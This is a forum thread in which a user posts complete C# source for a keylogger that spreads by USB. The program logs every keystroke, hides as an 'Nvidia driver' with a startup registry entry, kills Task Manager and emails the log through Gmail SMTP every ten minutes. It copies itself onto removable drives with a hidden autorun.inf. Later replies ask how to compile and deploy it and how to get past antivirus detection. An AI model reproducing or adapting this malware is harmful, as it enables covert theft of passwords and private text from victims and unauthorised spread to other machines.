Keylogger + Email + USB Spread Written in C#

Discussion in 'C#' started by Cleptography, Sep 6, 2010.

  1. Cleptography

    Cleptography New Member

    Joined:
    Sep 2, 2010
    Messages:
    39
    Likes Received:
    7
    Trophy Points:
    0
    This is a keylogger + email + usb spread written in c#
    I can not take full credit for this program. Creds to the original author.
    I have modified it a bit, but you get the idea.

    Code:
    using System;
    using System.Diagnostics;
    using System.Timers;
    using System.Windows.Forms;
    using System.Runtime.InteropServices;
    using System.IO;
    using System.Net;
    using System.Net.Mail;
    using Microsoft.Win32;
    
    namespace Keylogger_V2
    {
        class Program
        {
            private const int WH_KEYBOARD_LL = 13;
            private const int WM_KEYDOWN = 0x0100;
            private static LowLevelKeyboardProc _proc = HookCallback;
            private static IntPtr _hookID = IntPtr.Zero;
            public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
            public static byte caps = 0, shift = 0, failed = 0;
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            private static extern bool UnhookWindowsHookEx(IntPtr hhk);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr GetModuleHandle(string lpModuleName);
    
            public static void Main()
            {
            _hookID = SetHook(_proc);
            Program.startup();
            System.Timers.Timer timer;
            timer = new System.Timers.Timer();
            timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
            timer.AutoReset = true;
            timer.Interval = 600000;
            timer.Start();
            System.Timers.Timer timer2;
            timer2 = new System.Timers.Timer();
            timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
            timer2.AutoReset = true;
            timer2.Interval = 10000;
            timer2.Start();
            Application.Run();
            GC.KeepAlive(timer);
            GC.KeepAlive(timer2);
            UnhookWindowsHookEx(_hookID);
            }
    
            public static void startup()
            {
                //Try to copy keylogger in some folders
                string source = Application.ExecutablePath.ToString();
                string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                destination=System.IO.Path.Combine(destination,"nvdisp.exe");
                try
                {
                    System.IO.File.Copy(source, destination,false);
                    source = destination;
                } catch {
                    Console.WriteLine("No authorization to copy file or other error.");
                }
                //Find if the file already exist in startup
                try
                {
                    RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", destination);
                    }
    
                    registryKey.Close();//dispose of the Key
                } catch {
                    Console.WriteLine("Error setting startup reg key.");
                }
                //Try to add to all users
                try
                {
                    RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", source);
                    }
    
                    registryKey.Close();//dispose of the key
                }
                catch
                {
                    Console.WriteLine("Error setting startup reg key for all users.");
                }
            }
    
            public static void OnTimedEvent(object source, EventArgs e)
            {
                Process[] ProcessList = Process.GetProcesses();
                foreach (Process proc in ProcessList)
                {
                    if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
                    {
                        proc.Kill();
                    }
                }
                System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
                msg.To.Add("username@gmail.com");
                msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
                msg.Subject = "i don't know";
                msg.SubjectEncoding = System.Text.Encoding.UTF8;
                msg.Body = "ciao ale";
                msg.BodyEncoding = System.Text.Encoding.UTF8;
                msg.IsBodyHtml = false;
                msg.Priority = MailPriority.High;
                SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
                client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
                client.Port = 587;
                client.Host = "smtp.gmail.com";
                client.EnableSsl = true;
                Attachment data = new Attachment(Program.path);
                msg.Attachments.Add(data);
                try
                {
                    client.Send(msg);
                    failed = 0;
                }
                catch
                {
                    data.Dispose();
                    failed = 1;
                }
                data.Dispose();
    
                if (failed == 0)
                    File.WriteAllText(Program.path, ""); //empties the file
        
                failed = 0;
        
            }
    
            private static IntPtr SetHook(LowLevelKeyboardProc proc)
            {
                using (Process curProcess = Process.GetCurrentProcess())
                using (ProcessModule curModule = curProcess.MainModule)
                {
                    return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
                }
            }
            private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
            private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
            {
                if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
                {
                    StreamWriter sw = File.AppendText(Program.path);
                    int vkCode = Marshal.ReadInt32(lParam);
                    if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
                    
                switch ((Keys)vkCode)
                    {
                        case Keys.Space:
                            sw.Write(" ");
                            break;
                        case Keys.Return:
                            sw.WriteLine("");
                            break;
                        case Keys.Back:
                            sw.Write("back");
                            break;
                        case Keys.Tab:
                            sw.Write("TAB");
                            break;
                        case Keys.D0:
                            if (Program.shift == 0) sw.Write("0");
                            else sw.Write(")");
                            break;
                        case Keys.D1:
                            if (Program.shift == 0) sw.Write("1");
                            else sw.Write("!");
                            break;
                        case Keys.D2:
                            if (Program.shift == 0) sw.Write("2");
                            else sw.Write("@");
                            break;
                        case Keys.D3:
                            if (Program.shift == 0) sw.Write("3");
                            else sw.Write("#");
                            break;
                        case Keys.D4:
                            if (Program.shift == 0) sw.Write("4");
                            else sw.Write("$");
                            break;
                        case Keys.D5:
                            if (Program.shift == 0) sw.Write("5");
                            else sw.Write("%");
                            break;
                        case Keys.D6:
                            if (Program.shift == 0) sw.Write("6");
                            else sw.Write("^");
                            break;
                        case Keys.D7:
                            if (Program.shift == 0) sw.Write("7");
                            else sw.Write("&");
                            break;
                        case Keys.D8:
                            if (Program.shift == 0) sw.Write("8");
                            else sw.Write("*");
                            break;
                        case Keys.D9:
                            if (Program.shift == 0) sw.Write("9");
                            else sw.Write("(");
                            break;
                        case Keys.LShiftKey:
                        case Keys.RShiftKey:
                        case Keys.LControlKey:
                        case Keys.RControlKey:
                        case Keys.LMenu:
                        case Keys.RMenu:
                        case Keys.LWin:
                        case Keys.RWin:
                        case Keys.Apps:
                    sw.Write("");
                            break;
                        case Keys.OemQuestion:
                            if (Program.shift == 0) sw.Write("/");
                            else sw.Write("?");
                            break;
                        case Keys.OemOpenBrackets:
                            if (Program.shift == 0) sw.Write("[");
                            else sw.Write("{");
                            break;
                        case Keys.OemCloseBrackets:
                            if (Program.shift == 0) sw.Write("]");
                            else sw.Write("}");
                            break;
                        case Keys.Oem1:
                            if (Program.shift == 0) sw.Write(";");
                            else sw.Write(":");
                            break;
                        case Keys.Oem7:
                            if (Program.shift == 0) sw.Write("'");
                            else sw.Write('"');
                            break;
                        case Keys.Oemcomma:
                            if (Program.shift == 0) sw.Write(",");
                            else sw.Write("<");
                            break;
                        case Keys.OemPeriod:
                            if (Program.shift == 0) sw.Write(".");
                            else sw.Write(">");
                            break;
                        case Keys.OemMinus:
                            if (Program.shift == 0) sw.Write("-");
                            else sw.Write("_");
                            break;
                        case Keys.Oemplus:
                            if (Program.shift == 0) sw.Write("=");
                            else sw.Write("+");
                            break;
                        case Keys.Oemtilde:
                            if (Program.shift == 0) sw.Write("`");
                            else sw.Write("~");
                        break;
                    case Keys.Oem5:
                        sw.Write("|");
                        break;
                    case Keys.Capital:
                        if (Program.caps == 0) Program.caps = 1;
                        else Program.caps = 0;
                        break;
                    default:
                        if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                        if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                        break;
                }
                Program.shift = 0;
                sw.Close();
            }    
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
            }
    
            public static void USBSpread(object source, EventArgs e)
            {
                ///////////////////////////////////////////////////////////////
                /////////////////////// USB spread class //////////////////////
                ///////////////////////////////////////////////////////////////
                //A bit modified
                string source2 = Application.ExecutablePath.ToString();
                System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
                try
                {
                    foreach (System.IO.DriveInfo drive in drives)
                    {
                        if (drive.DriveType == DriveType.Removable)
                        {
                            string driveAutorun = drive.Name + "autorun.inf";
                            StreamWriter sw = new StreamWriter(driveAutorun);
                            sw.WriteLine("[autorun]\n");
                            sw.WriteLine("open=start.exe");
                            sw.WriteLine("action=Run VMCLite");
                            sw.Close();
                            File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                            try
                            {
                                File.Copy(source2, drive.Name + "start.exe", true);
                                File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                            }
                            finally
                            {
                                Console.WriteLine("Removable device rooted");
                            }
                        }
                    }
                }
                catch (Exception e2)
                {
                    Console.WriteLine(e2.ToString());
                }
            }
        }
    }
     
  2. bvgmanold

    bvgmanold New Member

    Joined:
    Sep 17, 2011
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    what to write in the main function of program.cs and what about the form1.cs ???
     
  3. bvgmanold

    bvgmanold New Member

    Joined:
    Sep 17, 2011
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    Ok thanks got it :)
     
  4. bvgmanold

    bvgmanold New Member

    Joined:
    Sep 17, 2011
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    Hey bro does this same code works for windows 7, vista etc ???
    and I am getting an issue on some PC's that the code to write to registry (startup) is not working, some time it writes some time not giving an exception of not enough privileges sort of thing...
     
  5. justC#

    justC# New Member

    Joined:
    Apr 26, 2012
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Hello C# gurus. I am newbie to c# coding. I just wanted to know that. Where to place this entire code. I mean shall I first take a win form and use this code as namespace ? Please help me in this, I want to use this in my project. Help is highly appreciated.
     
  6. hypertuned

    hypertuned New Member

    Joined:
    Mar 15, 2017
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Gender:
    Male
    Hi, I tested this on Esset Smart Security 8 and it caught this as a virus "A variant of MSIL/SPY.KEYLOGGER.CAM Trojan". What should I do?
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice